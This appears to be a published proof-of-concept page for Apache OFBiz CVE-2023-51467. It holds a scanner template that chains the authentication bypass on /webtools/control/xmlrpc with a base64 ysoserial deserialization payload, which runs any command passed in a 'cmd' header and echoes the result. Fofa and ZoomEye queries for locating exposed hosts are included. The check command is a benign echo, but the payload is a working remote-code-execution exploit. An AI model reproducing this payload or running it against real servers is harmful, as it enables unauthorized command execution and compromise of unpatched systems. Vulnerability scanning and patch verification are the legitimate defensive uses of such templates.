漏洞描述
Detecting Apache OFbiz - CVE-2023-51467 authentication bypass vulnerability, xmlrpc deserialization command execution exploit
Fofa: app="Apache_OFBiz"
ZoomEye: app:"Apache OFBiz"
apache-ofbiz-CVE-2023-51467-xmlrpc-rce: Apache ofbiz CVE-2023-51467 xmlrpc RCE
PoC代码[已公开]
id: apache-ofbiz-CVE-2023-51467-xmlrpc-rce
info:
name: Apache ofbiz CVE-2023-51467 xmlrpc RCE
author: JaneMandy
severity: critical
verified: true
description: |
Detecting Apache OFbiz - CVE-2023-51467 authentication bypass vulnerability, xmlrpc deserialization command execution exploit
Fofa: app="Apache_OFBiz"
ZoomEye: app:"Apache OFBiz"
reference:
- https://mp.weixin.qq.com/s/GfGb048u9VedzM2FhBJz8Q
- https://stack.chaitin.com/vuldb/detail/2dbae0cb-0292-45ee-a66d-a2567b11b257
tags: apache,ofbiz,rce,xmlrpc
created: 2023/12/30
rules:
r0:
request:
method: POST
headers:
Content-Type: application/xml
cmd: "echo \"Apache-5201314-Apache\""
path: /webtools/control/xmlrpc/?USERNAME=&PASSWORD=admin&requirePasswordChange=Y
body: <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK/K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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</serializable></value></member></struct></value></param></params></methodCall>
expression: response.status == 200 && response.body.bcontains(b'Apache-5201314-Apache')
expression: r0()